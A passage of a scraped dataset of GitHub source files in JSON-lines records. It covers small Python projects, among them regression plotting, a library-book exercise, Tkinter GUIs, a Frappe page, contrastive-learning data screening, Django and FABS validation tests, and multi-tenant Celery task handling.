color=\"cornflowerblue\", lw=2, label=\"Predicción\")\r\nplt.xlabel(\"Potencia (HP)\")\r\nplt.ylabel(\"Precio\")\r\nplt.title(\"Árbol de Regresión\")\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"GermanMer/Regression","sub_path":"58_ArbolDeRegresion_CaracteristicaNumerica.py","file_name":"58_ArbolDeRegresion_CaracteristicaNumerica.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1468813516","text":"class Biblioteka:\n def __init__(self):\n self.limit_wypozyczen = 3\n self.egzemplarze = []\n self.ksiazki = []\n\n def dodaj(self, tytul, autor, rok_wydania):\n ksiazka = Ksiazka(tytul, autor)\n egzemplarz = Egzemplarz(ksiazka, rok_wydania)\n\n self.egzemplarze.append(egzemplarz)\n\n for k in self.ksiazki:\n if k.tytul == tytul and k.autor == autor:\n k.liczba += 1\n return\n \n self.ksiazki.append(ksiazka)\n \n\nclass Ksiazka:\n def __init__(self, tytul, autor):\n self.tytul = tytul\n self.autor = autor\n self.liczba = 1\n\n def __repr__(self):\n return repr((self.tytul, self.autor, self.liczba))\n\n\nclass Egzemplarz:\n def __init__(self, ksiazka, rok_wydania):\n self.ksiazka = ksiazka\n self.rok_wydania = rok_wydania\n self.wypozyczony = False\n\n def __repr__(self):\n return repr((self.ksiazka.tytul, self.ksiazka.autor, self.rok_wydania))\n\n\nb = Biblioteka()\n\nn = int(input())\n\nfor i in range(0, n):\n k = eval(input())\n b.dodaj(k[0], k[1], k[2])\n\nb.ksiazki.sort(key=lambda x: x.tytul)\n\nfor ksiazka in b.ksiazki:\n print(ksiazka)","repo_name":"uep-inz-opr/7_biblioteka1-ksosulska","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33896755446","text":"from tkinter import *\r\nimport pandas as pd\r\nfrom tkinter import ttk\r\n\r\nroot=Tk()\r\nroot.geometry(\"700x500\")\r\n\r\nstyle = ttk.Style()\r\nstyle.theme_use('clam')\r\n\r\nmy_frame = Frame(root) #create frame\r\nmy_frame.pack(pady=20)\r\n\r\nmy_tree = ttk.Treeview(my_frame) #create treeview\r\n\r\ndf = pd.read_csv(\"sample CSV file.csv\") #path\r\n\r\nmy_tree[\"column\"] = list(df.columns) #setup new treeview\r\nmy_tree[\"show\"] = \"headings\"\r\n\r\nfor column in my_tree[\"column\"]: #Loop thru column list\r\n my_tree.heading(column , text=column , anchor=CENTER)\r\n my_tree.column(\"Sno\",width=30 , anchor=CENTER)\r\n my_tree.column(\"Customer Name\",width=100)\r\n my_tree.column(\"PO No\",width=80)\r\n my_tree.column(\"PO Date\",width=80)\r\n my_tree.column(\"Buyer Name\",width=100)\r\n my_tree.column(\"Lbl By Days\",width=80)\r\n my_tree.column(\"Lbl Date\",width=80)\r\n\r\ndf_rows = df.to_numpy().tolist() #put data in treeview\r\nfor rows in df_rows:\r\n my_tree.insert(\"\",\"end\",value=rows)\r\n\r\nmy_tree.pack() #pack the treeview finally\r\nroot.mainloop()\r\n","repo_name":"Vedavyaskota/Tkinter-csv2barchats-and-Dataframes","sub_path":"data frame.py","file_name":"data frame.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22770197147","text":"import utils\nimport network\nimport samples\nimport Tkinter\n\nclass Visualizer:\n\n def __init__(self, root, network, samples):\n self.epochs = 0\n self.root = root\n self.network = network\n self.samples = samples\n self.testSamples = samples.load('testing')\n self.root.configure(bg = utils.BG_COLOR, padx = 10, pady = 10)\n\n\n \"\"\"\n Handles the creation and placement of graphical elements\n on the interface.\n \"\"\"\n def gui_init(self):\n epoch_button = Tkinter.Button(self.root, text = \"Train 1 Epoch\",\n command = lambda: self.train_epoch(), relief = 'flat', bd = 2,\\\n font = utils.FONT, bg = utils.BUTTON_COLOR, highlightthickness = 0,\\\n highlightbackground = utils.EDGE_COLOR, fg = utils.TEXT_COLOR)\n epoch_button.grid(row = 1, column = 2, padx = 10, pady = 10, sticky = 'S')\n\n next_button = Tkinter.Button(self.root, text = \"Next Sample\",\n command = lambda: self.display_sample(), relief = 'flat', bd = 2,\\\n font = utils.FONT, bg = utils.BUTTON_COLOR, highlightthickness = 0,\\\n highlightbackground = utils.EDGE_COLOR, fg = utils.TEXT_COLOR)\n next_button.grid(row = 3, column = 2, padx = 10, pady = 10, sticky = 'N')\n\n self.display = Tkinter.Canvas(self.root, width = 596, height = 596,\\\n bg = utils.BG_COLOR, highlightthickness = 0)\n\n self.sampleDisplay = Tkinter.Canvas(self.root, width = 168, height = 168,\\\n bg = utils.BG_COLOR, highlightthickness = 0)\n\n \"\"\"\n Load in test data, and run the network on data, returning overall\n accuracy.\n \"\"\"\n def get_test_data(self):\n self.testSamples = self.samples.load('testing')\n samples = self.samples.load('testing')\n data = []\n accuracy = 0\n\n for test in range(utils.TEST_TIMES):\n label, sample = samples.next()\n datum = self.network.classify(sample)\n accuracy += datum == label\n data.append((datum, label))\n\n return (data, accuracy * 100 / float(utils.TEST_TIMES))\n\n \"\"\"\n Display a representation of the network's accuracy, where red blocks\n signify incorrectly classified data, while green blocks signify correctly\n classified data.\n \"\"\"\n def display_data(self, data):\n self.display.delete('all')\n offset = 4\n size = 2\n\n for i in range(utils.TEST_TIMES):\n x = (size + offset) * (i % 100)\n y = (size + offset) * (i / 100)\n color = utils.GREEN_COLOR if data[i][0] == data[i][1] else utils.RED_COLOR\n self.display.create_rectangle(x, y, x + size, y + size,\\\n fill = color, width = 0)\n self.display.grid(row = 0, column = 0, columnspan = 3, padx = 10, pady = 10)\n\n #Draw the MNIST image to the interface, and update.\n def display_sample(self):\n self.sampleDisplay.delete('all')\n size = 6\n label, sample = next(self.testSamples, (None, None))\n\n if label is None and sample is None:\n self.testSamples = self.samples.load('testing')\n label, sample = next(self.testSamples, (None, None))\n\n for i in range(784):\n color = tuple([max(33, sample[i] * 64)] * 3)\n self.sampleDisplay.create_rectangle((i % 28) * size, \\\n (i / 28) * size, (i % 28 + 1) * size, (i / 28 + 1) * size,\\\n fill = \"#%02x%02x%02x\" % color, outline = utils.BG_COLOR)\n\n output = self.network.classify(sample)\n self.sampleDisplay.grid(row = 1, column = 0, rowspan = 3, padx = 10, pady = 10, sticky = 'W')\n entry = Tkinter.Entry(self.root, highlightbackground = utils.BG_COLOR,\\\n bd = 0, width = 1, font = utils.CLASS_FONT, justify = 'center')\n\n entry.insert(0, \"%s\" % str(output))\n entry.configure(state = 'disabled', disabledbackground = utils.BG_COLOR,\\\n disabledforeground = utils.GREEN_COLOR if output == label else utils.RED_COLOR)\n entry.grid(row = 1, column = 1, rowspan = 3, padx = 10, pady = 10)\n\n self.root.update_idletasks()\n self.root.update()\n\n def display_title(self, accuracy):\n msg = \"Epoch %s, %s percent accurate\" % (self.epochs, accuracy)\n self.root.title(msg)\n\n #Update all elements of the interface\n def gui_update(self):\n data, accuracy = self.get_test_data()\n self.display_data(data)\n self.display_title(accuracy)\n self.display_sample()\n self.root.update_idletasks()\n self.root.update()\n\n \"\"\"\n Trains for 1 epoch, and then updates the interface to reflect the\n network's change in accuracy.\n \"\"\"\n def train_epoch(self):\n self.epochs += 1\n training_samples = self.samples.load('training')\n msg = \"Training...\"\n self.root.title(msg)\n self.root.update_idletasks()\n self.root.update()\n\n for train in range(utils.TRAIN_TIMES):\n label = [0] * 10\n index, sample = training_samples.next()\n label[index] = 1\n self.network.train(sample, label)\n self.gui_update()\n\ndef main(*args):\n bias = True\n net = network.Network(utils.NET_STRUCTURE, 0.01, bias)\n root = Tkinter.Tk()\n visualizer = Visualizer(root, net, samples)\n visualizer.gui_init()\n visualizer.gui_update()\n root.mainloop()\n\nmain()\n","repo_name":"tonylpan/neural-net","sub_path":"visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72974056747","text":"\n\nfrom __future__ import unicode_literals\n\nimport frappe, json\nfrom frappe import _dict\nimport frappe.share\nfrom frappe import _\nfrom frappe.utils import cint\nfrom frappe.boot import get_allowed_reports\nfrom frappe.permissions import get_roles, get_valid_perms \nfrom frappe.instructor import *\nfrom frappe.student import *\nfrom frappe.core.doctype.domain_settings.domain_settings import get_active_modules\nfrom datetime import date, timedelta,datetime\nimport locale\n\nno_cache = 1\n\n\t\n\ndef get_attendance(group):\n\tl = [r[:8] for r in frappe.db.sql(\"\"\"select student,student_name,sc.course,sc.instructor,att.status,att.date,emp.from_time,emp.to_time from `tabStudent Attendance` as att, `tabCourse Schedule` as sc, `tabEmploi` as emp where att.course_schedule=sc.name and att.emploi=emp.name and att.student_group=%s \"\"\",(group,) )]\n\treturn l\n\n\ndef get_context(context):\n\tdays=[\"Lundi\",\"Mardi\",\"Mercredi\",\"Jeudi\",\"Vendredi\",\"Samedi\",\"Dimanche\"]\n\tuser = frappe.session.user\n\tcontext.user=user\n\tcontext.classes=get_classes(user)\n\tgroup = frappe.request.environ.get('QUERY_STRING')\n\tgroup=group.replace(\"%20\",\" \")\n\tpage=\"\"\n\tif \"?\" in group:\n\t\tgroup,page=group.split(\"?\")\n\t\tif page.isdigit():\n\t\t\tpage=int(page)\n\t\telse:\n\t\t\tfrappe.local.flags.redirect_location = \"/instructeur/presence\"\n\t\t\traise frappe.Redirect\n\telse:\n\t\tpage=1\n\t\n\tcontext.page=page\n\tif group !=\"\" and group not in context.classes:\n\t\tfrappe.local.flags.redirect_location = \"/instructeur/presence\"\n\t\traise frappe.Redirect\n\tcontext.group=group\n\tcontext.students=get_students(group)\n\tfor i in range(len(context.students)) :\n\t\tcontext.students[i] = name_student(context.students[i])\n\ttoday = datetime.now()\n\tcontext.jour=days[today.weekday()]\n\tcontext.today= today.strftime(\"%d-%m-%Y\")\n\tcontext.calendar= getschedule('A' ,day=context.jour,groupe=group)\n\tallc=[]\n\tdi=[]\n\tfor i in range(6):\n\t\tsc=getschedule('A' ,day=days[i],groupe=group)\n\t\tdi.append([days[i],len(sc)])\n\t\tallc.append([days[i],sc])\n\tcontext.allc=allc\n\tcontext.di=di\n\tstart = today - timedelta(days=today.weekday())\n\tend = start + timedelta(days=6)\n\tstart = start.strftime(\"%d-%m-%y\")\n\tend= end.strftime(\"%d-%m-%y\")\n\tcontext.semaine=[start,end]\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"bahaou/pages","sub_path":"instructeur/presence.py","file_name":"presence.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6226742875","text":"import os\nimport numpy as np\nimport sys\nimport pdb\n\nfrom tqdm import tqdm\n\nimport torch\nimport torch.multiprocessing as mp\n\nPROJECT_DIR = os.path.abspath(os.path.join(os.getcwd(), '..'))\nsys.path.insert(0, PROJECT_DIR)\n\n# from visualize_geo_dist import load_geo_dist\nfrom supercon.setup_geo_distance import compute_raw_ranking\n\n\ndef load_geo_dist(scene):\n \"\"\"\n Load pre-computed geometric distance table.\n \"\"\"\n geo_dist_path = os.path.abspath(os.path.join(PROJECT_DIR, \"datasets\", scene, 'geo_dist.dat'))\n assert os.path.exists(geo_dist_path)\n print('Load geometric distance from {:s}...'.format(geo_dist_path))\n geo_dist_dict = torch.load(geo_dist_path)\n geo_dist = geo_dist_dict['geo_dist'].cpu() # raw distance table, debug purpose\n\n sim_data = geo_dist_dict['sim_data'].cpu()\n dict_name_to_idx = geo_dist_dict['dict_name_to_idx']\n dict_idx_to_name = geo_dist_dict['dict_idx_to_name']\n hyper_params = geo_dist_dict['hyper_params']\n dict_supercon = geo_dist_dict['dict_supercon']\n dict_ranking = geo_dist_dict['dict_ranking'] # raw ranking dict, debug purpose\n feasible_anchor = geo_dist_dict['feasible_anchor']\n trans_dist = geo_dist_dict['trans_dist'].cpu()\n\n # dict_inv_ranking_path = os.path.abspath(os.path.join(PROJECT_DIR, \"datasets\", scene, 'dict_inv_ranking.dat'))\n # with open(dict_inv_ranking_path, 'rb') as f:\n # dict_inv_ranking = pickle.load(f)\n\n _, dict_inv_ranking = compute_raw_ranking(geo_dist, torch.sum(sim_data).item())\n\n # pdb.set_trace()\n\n return sim_data, dict_name_to_idx, dict_idx_to_name, hyper_params, dict_supercon, dict_ranking, dict_inv_ranking, feasible_anchor, trans_dist\n\n\ndef check_backward_ranking(sample_ranking, anchor_id, k_percentage, reverse=False):\n \"\"\"\n Check backward ranking/re-ranking constraint.\n \"\"\"\n if isinstance(sample_ranking, list) and isinstance(sample_ranking[0], np.ndarray):\n sample_ranking_cat = np.stack(sample_ranking, axis=0) # [B, N]\n if reverse:\n sample_ranking_cat = sample_ranking_cat[:, ::-1] \n b_rank_rows, backward_rank_ls = np.where(sample_ranking_cat == anchor_id)\n assert np.array_equal(np.sort(b_rank_rows), np.arange(sample_ranking_cat.shape[0])), print(b_rank_rows) # sanity check, anchor_id should appear in each row once and only once\n critical_backward_rank = np.ceil(sample_ranking_cat.shape[1] * k_percentage).astype('int')\n return backward_rank_ls < critical_backward_rank # [B, ]\n elif isinstance(sample_ranking, np.ndarray):\n assert anchor_id in sample_ranking # sanity check\n if reverse:\n sample_ranking = sample_ranking[::-1]\n backward_rank = int(np.where(sample_ranking == anchor_id)[0]) # reciprocal rank of anchor seen from sample\n critical_backward_rank = np.ceil(len(sample_ranking) * k_percentage).astype('int') # top/bottom k% re-ranking\n return backward_rank < critical_backward_rank # scalar\n else:\n raise NotImplementedError\n \n \ndef _backbone_trim_ranking(trans_dist_vec, dict_ranking,\n in_dom_pos_cand, in_dom_pos_cand_inv_rank,\n cross_dom_pos_cand, cross_dom_pos_cand_inv_rank,\n in_dom_neg_cand, in_dom_neg_cand_inv_rank,\n cross_dom_neg_cand, cross_dom_neg_cand_inv_rank,\n pos_max_trans, pos_backward_coef, neg_backward_coef,\n dict_supercon, i_anchor, feasible_anchor, mp_progress, mp_lock):\n\n print(\"\\rProgress: {:d} / {:d}\".format(mp_progress.value, len(dict_supercon)), flush=True, end=' ')\n # store top k% in-domain positives with re-ranking\n flag_re_ranking = in_dom_pos_cand_inv_rank < len(dict_ranking[in_dom_pos_cand[0]]['same']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, in_dom_pos_cand) < pos_max_trans\n in_dom_positives = in_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store top k% cross-domain positives with re-ranking\n flag_re_ranking = cross_dom_pos_cand_inv_rank < len(dict_ranking[cross_dom_pos_cand[0]]['diff']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, cross_dom_pos_cand) < pos_max_trans\n cross_dom_positives = cross_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store bottom k% in-domain negatives with re-ranking\n flag_re_ranking = in_dom_neg_cand_inv_rank > len(dict_ranking[in_dom_neg_cand[0]]['same']) * (1 - neg_backward_coef)\n in_dom_negatives = in_dom_neg_cand[flag_re_ranking] # to save\n\n # store bottom k% cross-domain negatives with re-ranking\n flag_re_ranking = cross_dom_neg_cand_inv_rank > len(dict_ranking[cross_dom_neg_cand[0]]['diff']) * (1 - neg_backward_coef)\n cross_dom_negatives = cross_dom_neg_cand[flag_re_ranking] # to save\n\n # aggregate into a dict\n dict_anchor = {\n \"positive\": {\"same\": in_dom_positives, \"diff\": cross_dom_positives},\n \"negative\": {\"same\": in_dom_negatives, \"diff\": cross_dom_negatives}\n }\n dict_supercon[i_anchor] = dict_anchor\n \n if len(cross_dom_positives) > 0:\n feasible_anchor.append(i_anchor)\n\n with mp_lock:\n mp_progress.value += 1\n print(\"\\rProgress: {:d} / {:d}\".format(mp_progress.value, len(dict_supercon)), flush=True, end=' ')\n \n\ndef trim_ranking(dict_ranking, dict_inv_ranking, trans_dist, pos_forward_coef, pos_backward_coef, pos_max_trans, neg_forward_coef, neg_backward_coef):\n \"\"\"\n Thresholding to get feasible anchors and the associated prescreened positives and negatives.\n \"\"\"\n \n dict_supercon = {}\n feasible_anchor = []\n\n for i_anchor in tqdm(range(len(dict_ranking)), desc='Sample thresholding based on reciprocal rank: O(n)'):\n trans_dist_vec = trans_dist[i_anchor]\n\n # store top k% in-domain positives with re-ranking\n in_dom_pos_cand = dict_ranking[i_anchor]['same']\n in_dom_pos_cand = in_dom_pos_cand[:np.ceil(pos_forward_coef * len(in_dom_pos_cand)).astype('int')]\n in_dom_pos_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['same'][i_anchor] for i_sample in in_dom_pos_cand])\n flag_re_ranking = in_dom_pos_cand_inv_rank < len(dict_ranking[in_dom_pos_cand[0]]['same']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, in_dom_pos_cand) < pos_max_trans\n in_dom_positives = in_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store top k% cross-domain positives with re-ranking\n cross_dom_pos_cand = dict_ranking[i_anchor]['diff']\n cross_dom_pos_cand = cross_dom_pos_cand[:np.ceil(pos_forward_coef * len(cross_dom_pos_cand)).astype('int')]\n cross_dom_pos_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['diff'][i_anchor] for i_sample in cross_dom_pos_cand])\n flag_re_ranking = cross_dom_pos_cand_inv_rank < len(dict_ranking[cross_dom_pos_cand[0]]['diff']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, cross_dom_pos_cand) < pos_max_trans\n cross_dom_positives = cross_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store bottom k% in-domain negatives with re-ranking\n in_dom_neg_cand = dict_ranking[i_anchor]['same']\n in_dom_neg_cand = in_dom_neg_cand[-np.ceil(neg_forward_coef * len(in_dom_neg_cand)).astype('int'):]\n in_dom_neg_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['same'][i_anchor] for i_sample in in_dom_neg_cand])\n flag_re_ranking = in_dom_neg_cand_inv_rank > len(dict_ranking[in_dom_neg_cand[0]]['same']) * (1 - neg_backward_coef)\n in_dom_negatives = in_dom_neg_cand[flag_re_ranking] # to save\n\n # store bottom k% cross-domain negatives with re-ranking\n cross_dom_neg_cand = dict_ranking[i_anchor]['diff']\n cross_dom_neg_cand = cross_dom_neg_cand[-np.ceil(neg_forward_coef * len(cross_dom_neg_cand)).astype('int'):]\n cross_dom_neg_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['diff'][i_anchor] for i_sample in cross_dom_neg_cand])\n flag_re_ranking = cross_dom_neg_cand_inv_rank > len(dict_ranking[cross_dom_neg_cand[0]]['diff']) * (1 - neg_backward_coef)\n cross_dom_negatives = cross_dom_neg_cand[flag_re_ranking] # to save\n\n # aggregate into a dict\n dict_anchor = {\n \"positive\": {\"same\": in_dom_positives, \"diff\": cross_dom_positives},\n \"negative\": {\"same\": in_dom_negatives, \"diff\": cross_dom_negatives}\n }\n dict_supercon[i_anchor] = dict_anchor\n\n if len(cross_dom_positives) > 0:\n feasible_anchor.append(i_anchor)\n\n return dict_supercon, feasible_anchor\n\n\ndef main():\n # Recap on raw data structure\n coords = torch.load(os.path.join(PROJECT_DIR, 'datasets/EPFL/test_real/init/EPFL_2020-09-17-piloted_00035_DJI_0067.dat'))\n print(\"Coordinate raw data shape {}\".format(coords.shape))\n\n depth = torch.load(os.path.join(PROJECT_DIR, 'datasets/EPFL/test_real/depth/EPFL_2020-09-17-piloted_00035_DJI_0067.dat'))\n print(\"Depth raw data shape {}\".format(depth.shape))\n\n normal = torch.load(os.path.join(PROJECT_DIR, 'datasets/EPFL/test_real/normal/EPFL_2020-09-17-piloted_00035_DJI_0067.dat'))\n print(\"Normal raw data shape {}\".format(normal.shape))\n\n scene = 'EPFL'\n\n # read geo distance table\n sim_data, dict_name_to_idx, dict_idx_to_name, hyper_params, dict_supercon, dict_ranking, dict_inv_ranking, feasible_anchor, trans_dist = load_geo_dist(scene)\n print('%d / %d samples are feasible anchors after pre-screening.' % (len(feasible_anchor), len(sim_data)))\n\n # check the simple concatenation of sim-real data\n sim_size = sim_data.sum().item()\n for i in range(len(sim_data)):\n if i < sim_size:\n assert sim_data[i]\n else:\n assert ~sim_data[i]\n real_size = len(sim_data) - sim_size\n\n torch.cuda.empty_cache()\n\n trans_dist = trans_dist.cpu().numpy()\n new_dict_supercon, new_feasible_anchor = trim_ranking(dict_ranking, dict_inv_ranking, trans_dist, pos_max_trans=150,\n pos_forward_coef=0.01, pos_backward_coef=0.05,\n neg_forward_coef=0.05, neg_backward_coef=0.05)\n\n pdb.set_trace()\n\n\nif __name__ == '__main__':\n mp.set_start_method('spawn')\n\n main()\n","repo_name":"Shanci-Li/visnav_semantics","sub_path":"CrossLoc/_helper/geo_dist_screening.py","file_name":"geo_dist_screening.py","file_ext":"py","file_size_in_byte":10480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25055021438","text":"from django.test import TestCase\nfrom .models import MenuItem, Booking\n\nclass MenuItemTest(TestCase):\n def test_get_item(self):\n item = MenuItem.objects.create(title=\"ice cream\", price=30, inventory=12)\n itemstr = item.get_item()\n\n self.assertEqual(itemstr, \"ice cream : 30\")\n\nclass BookingTest(TestCase):\n def test_get_booking(self):\n booking = Booking.objects.create(Name=\"ahmad2\", No_of_guests=3, BookingDate=\"2023-06-21T20:21:00Z\")\n itemstr = booking.get_booking()\n\n self.assertEqual(itemstr, \"ahmad2\")","repo_name":"Ahmadra221/littlelemon2","sub_path":"resturant/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38894487548","text":"#!/usr/bin/python3\n#Risale dalla foglia verso la radice per cercare la mossa vincente\nimport fileinput\nimport sys \nsys.setrecursionlimit(10**5) \nfrom collections import deque\ndef BUCKET(ID = -1, start = -1, end = -1, father = -1):\n a = [ID, start, end, father]\n return a\n\nCACHE = []\nALL_BUCKETS = []\nTREE_BUCKETS = []\ndef DFS(index, ignore = -1):\n global CACHE\n if(CACHE[index] != -1):\n return CACHE[index]\n risposta = 0\n for i in TREE_BUCKETS[index]:\n if(ALL_BUCKETS[i][0] != ignore):\n risposta = risposta ^ (DFS(i, ignore) + 1)\n CACHE[index] = risposta\n return risposta\n\n\ndef init_globals(N):\n toReserve = int(N/2 + 1)\n global TREE_BUCKETS\n TREE_BUCKETS = [[] for _ in range (toReserve)]\n global ALL_BUCKETS\n ALL_BUCKETS = [BUCKET() for _ in range(toReserve)]\n ALL_BUCKETS[0] = BUCKET(0, 0, -1, 0)\n global CACHE\n CACHE = [-1 for _ in range(toReserve)]\n\ndef parser(parentesi):\n init_globals(len(parentesi))\n stack = deque()\n globalID = 0\n index = 0\n stack.appendleft(globalID)\n global ALL_BUCKETS\n global TREE_BUCKETS\n global CACHE\n for c in parentesi:\n if(c == '('):\n globalID+=1\n ALL_BUCKETS[globalID] = BUCKET(globalID, index, -1, stack[0])\n TREE_BUCKETS[stack[0]].append(globalID)\n stack.appendleft(globalID)\n elif(c == ')'):\n ALL_BUCKETS[stack[0]][2] = index\n stack.popleft()\n ALL_BUCKETS[stack[0]][2] = index\n else:\n exit(1)\n \n index += 1\n\nif __name__ == \"__main__\":\n N = int(sys.stdin.readline())\n parentesi = sys.stdin.readline()\n parentesi = parentesi[:-1]\n assert(N == len(parentesi))\n\n parser(parentesi)\n\n risp = DFS(0)\n\n if(0): #debug\n print(TREE_BUCKETS)\n print()\n for _ in ALL_BUCKETS:\n print(_)\n print()\n print(CACHE)\n\n if(risp != 0):\n print(1)\n for i in range(1,len(CACHE)):\n j = i\n tryOne = CACHE[ALL_BUCKETS[j][3]] ^ (CACHE[j] + 1) #nulla i\n j = ALL_BUCKETS[j][3] #father\n while(j != 0): #ricalcola i valori fino alla radice\n tryOne = (tryOne + 1) ^ CACHE[ALL_BUCKETS[j][3]] ^ (CACHE[j] + 1)\n j = ALL_BUCKETS[j][3]\n if(tryOne == 0):\n print(ALL_BUCKETS[i][1], ALL_BUCKETS[i][2])\n break\n else:\n print(0)","repo_name":"romeorizzi/esami-algo-public","sub_path":"2020-09-18/gioco_parentesi/sol/traduzione_noclass_speedup.py","file_name":"traduzione_noclass_speedup.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"14389273565","text":"import celery\nfrom celery.app.task import Task\nfrom django.db import connection\n\nfrom tenant_schemas_celery.cache import SimpleCache\n\n_shared_storage = {}\n\n\nclass SharedTenantCache(SimpleCache):\n def __init__(self):\n super(SharedTenantCache, self).__init__(storage=_shared_storage)\n\n\nclass TenantTask(Task):\n \"\"\" Custom Task class that injects db schema currently used to the task's\n keywords so that the worker can use the same schema.\n \"\"\"\n\n abstract = True\n\n tenant_cache_seconds = None\n tenant_databases = None\n\n @classmethod\n def get_tenant_databases(cls):\n \"\"\"Return the databases where the schema should be switched\"\"\"\n if cls.tenant_databases is not None:\n return cls.tenant_databases\n if hasattr(cls.app.conf, \"task_tenant_databases\") is True:\n return cls.app.conf.task_tenant_databases\n return (\"default\", )\n\n @classmethod\n def tenant_cache(cls):\n return SharedTenantCache()\n\n @classmethod\n def get_tenant_for_schema(cls, schema_name):\n from .compat import get_tenant_model\n\n missing = object()\n cache = cls.tenant_cache()\n cached_value = cache.get(schema_name, default=missing)\n tenant_cache_seconds = cls.tenant_cache_seconds\n if tenant_cache_seconds is None: # if not set at task level\n try: # to get from global setting\n tenant_cache_seconds = int(cls._get_app().conf.task_tenant_cache_seconds)\n except AttributeError:\n tenant_cache_seconds = 0 # default\n\n if cached_value is missing:\n cached_value = get_tenant_model().objects.get(schema_name=schema_name)\n cache.set(\n schema_name, cached_value, expire_seconds=tenant_cache_seconds\n )\n\n return cached_value\n\n def _update_headers(self, kw):\n kw[\"headers\"] = kw.get(\"headers\") or {}\n self._add_current_schema(kw[\"headers\"])\n\n def _add_current_schema(self, kwds):\n kwds[\"_schema_name\"] = kwds.get(\"_schema_name\", connection.schema_name)\n\n def apply(self, args=None, kwargs=None, *arg, **kw):\n if celery.VERSION[0] < 4:\n kwargs = kwargs or {}\n self._add_current_schema(kwargs)\n\n else:\n # Celery 4.0 introduced strong typing and the `headers` meta dict.\n self._update_headers(kw)\n return super(TenantTask, self).apply(args, kwargs, *arg, **kw)\n","repo_name":"maciej-gol/tenant-schemas-celery","sub_path":"tenant_schemas_celery/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"27885302251","text":"from tests.unit.dataactcore.factories.staging import FABSFactory\nfrom tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n\n_FILE = 'fabs15_1'\n\n\ndef test_column_headers(database):\n expected_subset = {'row_number', 'legal_entity_country_code', 'legal_entity_foreign_city', 'record_type',\n 'uniqueid_AssistanceTransactionUniqueKey'}\n actual = set(query_columns(_FILE, database))\n assert expected_subset == actual\n\n\ndef test_success(database):\n \"\"\" Test success LegalEntityForeignCityName is required for foreign recipients (i.e., when\n LegalEntityCountryCode != USA) for non-aggregate and PII-redacted non-aggregate records (RecordType = 2 or 3)\n \"\"\"\n\n fabs_1 = FABSFactory(legal_entity_country_code='Japan', legal_entity_foreign_city='Tokyo', record_type=2,\n correction_delete_indicatr='')\n fabs_2 = FABSFactory(legal_entity_country_code='UK', legal_entity_foreign_city='Manchester', record_type=3,\n correction_delete_indicatr=None)\n fabs_3 = FABSFactory(legal_entity_country_code='USA', legal_entity_foreign_city=None, record_type=2,\n correction_delete_indicatr='c')\n fabs_4 = FABSFactory(legal_entity_country_code='UsA', legal_entity_foreign_city='', record_type=3,\n correction_delete_indicatr='C')\n fabs_5 = FABSFactory(legal_entity_country_code='UK', legal_entity_foreign_city='', record_type=1,\n correction_delete_indicatr='')\n fabs_6 = FABSFactory(legal_entity_country_code='CAN', legal_entity_foreign_city=None, record_type=1,\n correction_delete_indicatr='')\n # Ignore correction delete indicator of D\n fabs_7 = FABSFactory(legal_entity_country_code='Canada', legal_entity_foreign_city='', record_type=3,\n correction_delete_indicatr='d')\n\n errors = number_of_errors(_FILE, database, models=[fabs_1, fabs_2, fabs_3, fabs_4, fabs_5, fabs_6, fabs_7])\n assert errors == 0\n\n\ndef test_failure(database):\n \"\"\" Test failure LegalEntityForeignCityName is required for foreign recipients (i.e., when\n LegalEntityCountryCode != USA) for non-aggregate and PII-redacted non-aggregate records (RecordType = 2 or 3)\n \"\"\"\n\n fabs = FABSFactory(legal_entity_country_code='Japan', legal_entity_foreign_city=None, record_type=2,\n correction_delete_indicatr='')\n fabs_2 = FABSFactory(legal_entity_country_code='Canada', legal_entity_foreign_city='', record_type=3,\n correction_delete_indicatr='c')\n\n errors = number_of_errors(_FILE, database, models=[fabs, fabs_2])\n assert errors == 2\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"tests/unit/dataactvalidator/test_fabs15_1.py","file_name":"test_fabs15_1.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"13671756509","text":"import cv2 as cv\nimport numpy as np\n\n\ndef show_circles(img, location):\n \"\"\"show pictures in colour with the location of iris\n location list of circles to print to picture\n img: rbg 